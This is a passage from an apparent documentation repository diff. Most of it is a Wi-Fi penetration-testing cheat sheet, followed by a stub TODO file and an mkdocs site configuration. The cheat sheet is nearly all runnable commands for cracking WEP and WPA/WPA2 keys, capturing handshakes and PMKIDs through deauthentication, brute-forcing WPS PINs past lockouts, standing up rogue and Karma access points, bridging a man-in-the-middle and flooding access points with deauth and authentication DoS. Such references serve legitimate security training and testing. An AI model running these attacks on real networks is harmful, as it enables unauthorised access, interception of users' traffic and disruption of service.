airmon-ng start wlan0 3 # only a particular channel : 3
airodump-ng -c 3 --bssid $AP_MAC -w clearcap mon0 # dump traffic
# fake authentication for a more reliable attack
aireplay-ng -1 0 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0
# interactive replay attack (min arp 68, max arp 86)
aireplay-ng -2 -b $AP_MAC -d FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0 # interactive - natural selection of a packet
aireplay-ng -2 -b $AP_MAC -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0 # interactive - force create a packet
# Packet selection (ARP packets met the characteristics):
# - APs will always repeat packets destined to the broadcast
# - The packet will have the ToDS (To Distribution System) bit set to 1
# answer "y" multiple times
# cracking require ~> 250000 IVs
aircrack-ng -0 -z -n 64 clientwep-01.cap
* -z: PTW attack
* -n: number of bits in the WEP key
# backup file with an ARP packet
aireplay-ng -2 -r replay.cap mon0
```
### Cracking WEP without a Client
* Chopchop & Fragmentation attack => PRGA, generate more packets with weak IVs
* Need an AP configured with open system authentication
Prerequisite:
```powershell
# put into monitor mode on our desired channel
airmon-ng start wlan0 3 # only a particular channel : 3
airodump-ng -c 3 --bssid $AP_MAC -w wepcrack mon0 # see no client
# fake authentication attack with association timing (every 60s try to reassociate)
aireplay-ng -1 60 -e $AP_SSID -b $AP_MAC -h $ATTACKER_MAC mon0 # should see a client in airodump
# -1 6000 to avoid a time out.
```
#### Fragmentation attack
> Goal: 1500 bytes of PRGA Atheros does not generate the correct packets unless the wireless card is set to the MAC address you are spoofing.
```powershell
# attacker mac must be associated (fake auth)
# Press "Y"
aireplay-ng -5 -b $AP_MAC -h $ATTACKER_MAC mon0
# use our PRGA from the fragmentation attack to generate an ARP request
# SRC_ADDR: 192.168.1.100
# DST_ADDR: 192.168.1.255, should not exist (broadcast address)
packetforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y frag.xor -w inject.cap
# -k: the destination IP i.e. in ARP, this is "Who has this IP"
# -l: the source IP i.e. in ARP, this is "Tell this IP"
# check the packet
tcpdump -n -vvv -e -s0 -r inject.cap
# inject our crafted packet
aireplay-ng -2 -r inject.cap mon0
# crack the WEP key
# Aircrack-ng will auto-update when new IVs are available
aircrack-ng -0 wepcrack
# if 64-bit WEP is used, cracking time < 5 minutes
# switch to 128-bit keys after 600000 IVs
# use the `-f 4` after 2000000
aircrack-ng -n 64 <capture filename>
```
#### KoreK Chopchop attack
> Can't be used for every AP, might work when fragmentation fails Much slower than the fragmentation attack
```powershell
# chopchop attack: -4
# out decrypted: .cap
# out prga: .xor
# Press "Y" (choose a small packet)
aireplay-ng -4 -b $AP_MAC -h $ATTACKER_MAC mon0
# check the packet and find the network addresses
tcpdump -n -vvv -e -s0 -r inject.cap
# use our PRGA from the fragmentation attack
# SRC_ADDR: 192.168.1.100
# DST_ADDR: 192.168.1.255, should not exist (broadcast address)
packetforge-ng -0 -a $AP_MAC -h $ATTACKER_MAC -l $SRC_ADDR -k $DST_ADDR -y prga.xor -w chochop_out.cap
# inject our crafted packet
aireplay-ng -2 -r chochop_out.cap mon0
# crack the WEP key
aircrack-ng -0 wepcrack
```
### Bypassing WEP Shared Key Authentication SKA
> By default, most wireless drivers will attempt open authentication first. If open authentication fails, they will proceed to try shared authentication.
Prerequisite:
* Authentication: Shared Key
* When Fake Authentication => `AP rejects open-system authentication`
```powershell
# put into monitor mode on our desired channel
airmon-ng start wlan0 3 # only a particular channel : 3
airodump-ng -c 3 --bssid $AP_MAC -w sharedkey mon0
# deauthentication attack on the connected client
# airodump should display SKA under the AUTH column
# PRGA file will be saved as xxxx.xor
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
# TO CHECK aireplay-ng -0 10 a $AP_MAC -c $VICTIM_MAC mon0
# fake authentication attack with association timing (every 60s try to reassociate)
# should display switching to Shared Key Authentication
# If you are using a PRGA file obtained from a chopchop attack, make sure that it is at least 144 bytes long
# If you have "Part2: Association Not answering...(Step3)" -> spoof the mac address used to fake auth
aireplay-ng -1 60 -e $AP_SSID -y sharedkey.xor -b $AP_MAC -h $ATTACKER_MAC mon0
# ARP replay attack
aireplay-ng -3 -b $AP_MAC -h $ATTACKER_MAC mon0
# deauthentication attack on the connected client
# speed the ARP attack process using deauth
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
# TO CHECK: aireplay-ng -deauth 1 a $AP_MAC -h <FakedMac> wlan0mon
# crack the WEP key
aircrack-ng sharedkey.cap
```
### Cracking WPA PSK
#### Cracking WPA with John the Ripper
```powershell
# put into monitor mode on our desired channel
airmon-ng start wlan0 3 # only a particular channel : 3
airodump-ng -c 3 --bssid $AP_MAC -w wpajohn mon0 # see no client
# deauthentication to get the WPA handshake (Sniffing should show the 4-way handshake)
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
# crack without john the ripper (-b <BSSID>)
aircrack-ng -0 -w /pentest/passwords/john/password.lst wpajohn-01.cap
aircrack-ng -0 -w /pentest/passwords/john/password.lst wpajohn-01.cap
aircrack-ng -w password.lst,secondlist.txt wpajohn-01.cap # multiple dicts
# crack with john the ripper - combine mangling rules with aircrack
# rules example to add in /pentest/passwords/john/john.conf
# $[0-9]$[0-9]
# $[0-9]$[0-9]$[0-9]
john --wordlist=/pentest/wireless/aircrack-ng/test/password.lst --rules --stdout | aircrack-ng -0 -e $AP_SSID -w - /root/wpajohn
# generate PMKs for a faster cracking - Precomputed WPA Keys Database Attack
echo wifu > essid.txt
airolib-ng test.db --import essid essid.txt
airolib-ng test.db --stats
airolib-ng test.db --import passwd /pentest/passwords/john/password.lst
airolib-ng test.db --batch
airolib-ng test.db --stats
aircrack-ng -r test.db wpajohn-01.cap
# airolib-ng test.db --clean all
# Not in lab - Convert to hccap to use with John Jumbo
aircrack-ng <FileName>.cap -J <outFile>
hccap2john <outFile>.hccap > <JohnOutFile>
john <JohnOutFile>
```
#### Cracking WPA with coWPAtty
> Better for PMK Rainbow table attacks
```powershell
# put into monitor mode on our desired channel
airmon-ng start wlan0 3 # only a particular channel : 3
airodump-ng -c 3 --bssid $AP_MAC -w wpacow mon0 # see no client
# deauthentication to get the WPA handshake
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
# coWPAtty dictionary mode (slow)
cowpatty -r wpacow-01.cap -f /pentest/passwords/john/password.lst -2 -s $AP_SSID
# coWPAtty rainbow table mode (fast)
genpmk -f /pentest/passwords/john/password.lst -d wifuhashes -s $AP_SSID
cowpatty -r wpacow-01.cap -d wifuhashes -2 -s $AP_SSID
```
#### Cracking WPA with Pyrit
> Can use GPU
```powershell
# put into monitor mode on our desired channel
airmon-ng start wlan0 3 # only a particular channel : 3
airodump-ng -c 3 --bssid $AP_MAC -w wpapyrit mon0 # see no client
# deauthentication to get the WPA handshake
aireplay-ng -0 1 -a $AP_MAC -c $VICTIM_MAC mon0
# clean the cap and extract only good packets
pyrit -r wpapyrit-01.cap analyze
pyrit -r wpapyrit-01.cap -o wpastripped.cap strip
# dictionary attack - slow ++
pyrit -r wpapyrit-01.cap -i /pentest/passwords/john/password.lst -b $AP_MAC attack_passthrough
# pre-computed hashes attack - slow on CPU
pyrit eval # pwds in database
pyrit -i /pentest/passwords/john/password.lst import_passwords # import in the database
pyrit -e $AP_SSID create_essid
pyrit batch # generate
pyrit -r wpastripped.cap attack_db
# gpu power attack - fast on GPU
pyrit list_cores
pyrit -i /pentest/passwords/john/password.lst import_passwords # import in the database
pyrit -e $AP_SSID create_essid
pyrit batch
pyrit -r wpastripped.cap attack_db
```
#### WPA WPS Attack
```powershell
airmon-ng start wlan0
airodump-ng mon0
# Install
apt-get -y install build-essential libpcap-dev aircrack-ng pixiewps
git clone https://github.com/t6x/reaver-wps-fork-t6x
apt-get install reaver
# Reaver integrated dumping tool (can also airodump-ng)
# Wash gives information about WPS being locked or not
# Locked WPS will have less success chances
wash -i mon0
# Launch Reaver
reaver -i mon0 -b $AP_MAC -vv -S
reaver -i mon0 -c <Channel> -b $AP_MAC -p <PinCode> -vv -S
reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv
# Now using pixiexps, you can crack PIN offline
pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
# Then, you can use the PIN with reaver to get to cleartext password
reaver -i <monitor interface> -b <bssid> -c <channel> -p <PIN>
# Some manufacturers have implemented protections
# You can try different switches to bypass
# -L = Ignore locked state
# -N = Don't send NACK packets when errors are detected
# -d = delay X seconds between PIN attempts
# -T = set timeout period to X second (.5 means half second)
# -r = After X attemps, sleep for Y seconds
reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv -L -N -d 15 -T .5 -r 3:15
```
> Message "WARNING: Detected AP rate limiting, waiting 315 seconds before re-trying" -> AP is protected Message "WARNING: Receive timeout occured" -> AP is too far
#### WPA PMKID Attack
```powershell
INTERFACE=$(ifconfig | grep wlp | cut -d":" -f1) # mon0
# PMKID capture
# Note: Based on the noise on the wifi channel it can take some time to receive the PMKID.
# It can take a while to capture PKMID (several minutes++)
# We recommend running hcxdumptool up to 10 minutes before aborting.
# If an AP recieves our association request packet and supports sending
# sudo hcxdumptool -i wlan0mon -o outfile.pcapng --enable_status=1
PMKID=$(sudo hcxdumptool -o test.pcapng -i $INTERFACE --enable_status --filtermode=2)
echo $PMKID|grep 'FOUND PMKID' &> /dev/null
hcxpcaptool -z test.16800 test.pcapng
# Then convert the captured data to a suitable format for hashcat
# -E retrieve possible passwords from WiFi-traffic (additional, this list will include ESSIDs)
# -I retrieve identities from WiFi-traffic
# -U retrieve usernames from WiFi-traffic
# PMKID*MAC AP*MAC Station*ESSID
# 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a
hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng
# Cracking the HASH
hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
hashcat -m 16800 -d 1 -w 3 myHashes rockyou.txt
# Check clGetPlatformIDs(): CL_PLATFORM_NOT_FOUND_KHR
```
#### Cracking WPA with Bettercap
```powershell
# install and update
go get github.com/bettercap/bettercap
cd $GOPATH/src/github.com/bettercap/bettercap
make build && sudo make install
sudo bettercap -eval "caplets.update; q"
# run and recon the wifi APs
sudo bettercap -iface wlan0
# this will set the interface in monitor mode and start channel hopping on all supported frequencies
> wifi.recon on
# we want our APs sorted by number of clients for this attack, the default sorting would be `rssi asc`
> set wifi.show.sort clients desc
# every second, clear our view and present an updated list of nearby WiFi networks
> set ticker.commands 'clear; wifi.show'
> ticker on
# use the good channel
> wifi.recon.channel 1
```
**Bettercap WPA - Deauth and crack**
```powershell
# use the bssid of the AP
> wifi.deauth e0:xx:xx:xx:xx:xx
/path/to/cap2hccapx /root/bettercap-wifi-handshakes.pcap bettercap-wifi-handshakes.hccapx
/path/to/hashcat -m 2500 -a3 -w3 bettercap-wifi-handshakes.hccapx '?d?d?d?d?d?d?d?d'
```
**Bettercap WPA - PMKID attack**
```powershell
wifi.assoc all
/path/to/hcxpcaptool -z bettercap-wifi-handshakes.pmkid /root/bettercap-wifi-handshakes.pcap
/path/to/hashcat -m16800 -a3 -w3 bettercap-wifi-handshakes.pmkid '?d?d?d?d?d?d?d?d'
```
### Additional Aircrack-NG Tools
#### Remove Wireless Headers
```powershell
airdecap-ng -b $AP_MAC open-network.cap
* -dec.cap: stripped version of the file
```
#### Decrypt a WEP encrypted capture file
```powershell
airdecap-ng -w $WEP_KEY wep.cap
```
#### Decrypt a WPA2 encrypted capture file
```powershell
airdecap-ng -e $AP_SSID -p $WPA_PASSWORD tkip.cap
```
#### Remote Aircrack Suite
```powershell
airmon-ng start wlan0 3
airserv-ng -p 1337 -c 3 -d mon0
airodump-ng -c 3 --bssid $AP_MAC $HOST:$PORT
```
#### Wireless Intrusion Detection System
> Require wireless key and bssid
```powershell
airmon-ng start wlan0 3
# create the at0 interface
airtun-ng -a $AP_MAC -w $WEP_KEY mon0
# the interface will auto decrypt packets
```
### Wireless Reconnaissance
> Use CSV file from airodump
CAPR Graph
```powershell
airgraph-ng -i wifu-01.csv -g CAPR -o wifu-capr.png
# color
- green: wpa
- yellow: wep
- red: open
- black: unknown
```
CPG - Client Probe Graph
```powershell
airgraph-ng -i wifu-01.csv -g CPG -o wifu-cpg.png
```
### Kismet
```powershell
kismet
[enter][enter]
[tab][close]
# Select a source and begin a monitoring
Kismet > Add source > wlan0 > Add
.nettxt: data
.pcapdump: wireshark format
```
```powershell
# giskismet: kismet inside a SQL database
> require a GPS receiver
gpsd -n -N -D4 /dev/ttyUSB0
-N : foreground
-D : debugging level
# kismet will gather SSID and GPS location
giskismet -x kismet.netxml
# generate a kml file (Google Earth)
giskismet -q "select * from wireless" -o allaps.kml
giskismet -q "select * from wireless where Encryption='WEP'" -o wepaps.kml
```
### Rogue Access Point
#### WPA handshake
```powershell
airmon-ng start wlan0 3
airodump-ng -c 3 -d $ATTACKER_MAC -w airbase mon0
# basic fake AP
airbase-ng -c 3 -e $AP_SSID mon0
airbase-ng -c 3 -e $AP_SSID -z 4 -W 1 mon0
-W 1 : WEP
# get a WPA handshake if the client connect
aircrack-ng -w /pentest/passwords/john/password.lst airbase-01.cap
```
#### Karmetasploit
```powershell
# install a dhcp server
apt install dhcp3-server
airmon-ng start wlan0 3
airbase-ng -c 3 -P -C 60 -e $AP_MAC -v mon0
-P: respond to all probes
ifconfig at0 up 10.0.0.1/24
mkdir -p /var/run/dhcpd
chown -R dhcpd:dhcpd /var/run/dhcpd
touch /var/lib/dhcp3/dhcpd.leases
"CONF DHCP FROM VIDEO 75" > /tmp/dhcpd.conf
touch /tmp/dhcp.log
chown -R dhcpd:dhcpd /tmp/dhcp.log
dhcpd3 -f -cf /tmp/dhcpd.conf -pf /var/run/dhcpd/pid -lf /tmp/dhcp/log at0
karma.rc from metasploit
# comment the first 2 lines (load sqlite)
msfconsole -r /root/karma.rc
```
#### Access Point MITM
```powershell
airmon-ng start wlan0 3
airbase-ng -c 3 -e $AP_SSID_SPOOFED mon0
# create a bridged interface
# apt-get install bridge-utils
brctl addbr hacker
brctl addif hacker eth0
brctl addif hacker at0
# assign IP addresses
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig hacker 192.168.1.8 up
# enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
# mitm tools
driftnet
ettercap -G
Sniff > Unified sniffing > Hacker Interface
```
### Other things
```powershell
# Find Hidden SSID
aireplay-ng -0 20 a <BSSID> -c <VictimMac> mon0
# Mac Filtering
macchanger -mac <VictimMac> wlan0mon
aireplay-ng -3 b <BSSID> -h <FakedMac> wlan0mon
# MAC CHANGER
ifconfig wlan0mon down
macchanger -mac <macVictima> wlan0mon
ifconfig wlan0mon up
# Deauth Global
aireplay-ng -0 0 -e hacklab -c FF:FF:FF:FF:FF:FF wlan0mon
# Authentication DoS Mode
mdk3 wlan0mon a -a $AP_MAC
# Tshark - Filter and dislay data
tshark -r Captura-02.cap -Y "eapol" 2>/dev/null
tshark -i wlan0mon -Y "wlan.fc.type_subtype==4" 2>/dev/null
tshark -r Captura-02.cap -Y "(wlan.fc.type_subtype==0x08 || wlan.fc.type_subtype==0x05 || eapol) && wlan.addr==20:34:fb:b1:c5:53" 2>/dev/null
# Convert .cap with handshake to .hccap
aircrack-ng -J network network.cap
```
### References
* https://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/
* https://www.doyler.net/security-not-included/aireplay-0841-attack
* https://gist.github.com/s4vitar/3b42532d7d78bafc824fb28a95c8a5eb

2
docs/secure-boot/todo.md Normal file
View File

@ -0,0 +1,2 @@
# TODO

60
mkdocs.yml Normal file
View File

@ -0,0 +1,60 @@
site_name: Hardware All The Things
theme:
name: material
icon:
repo: fontawesome/brands/github
palette:
# Palette toggle for light mode
- media: "(prefers-color-scheme: light)"
scheme: default
toggle:
icon: material/brightness-7
name: Switch to dark mode
# Palette toggle for dark mode
- media: "(prefers-color-scheme: dark)"
scheme: slate
toggle:
icon: material/brightness-4
name: Switch to light mode
features:
- navigation.tracking
- toc.integrate
- navigation.top
markdown_extensions:
- def_list
- pymdownx.tasklist:
custom_checkbox: true
- tables
- admonition
- pymdownx.details
- pymdownx.superfences
- pymdownx.highlight:
anchor_linenums: true
- pymdownx.inlinehilite
- pymdownx.snippets
- attr_list
- pymdownx.emoji:
emoji_index: !!python/name:materialx.emoji.twemoji
emoji_generator: !!python/name:materialx.emoji.to_svg
repo_url: https://github.com/swisskyrepo/HardwareAllTheThings/
edit_uri: edit/master/
plugins:
- search
- git-revision-date-localized
# - git-committers:
# repository: swisskyrepo/PayloadsAllTheThings
# branch: main
# token: !ENV GH_TOKEN
# docs_path: docs/
# insiders-2.12.0 · Plugin · Experimental
# - social
# - tags
# - toc.integrate
# - navigation.instant
# logo: 'images/site_logo.png'
# favicon: 'images/favicon.png'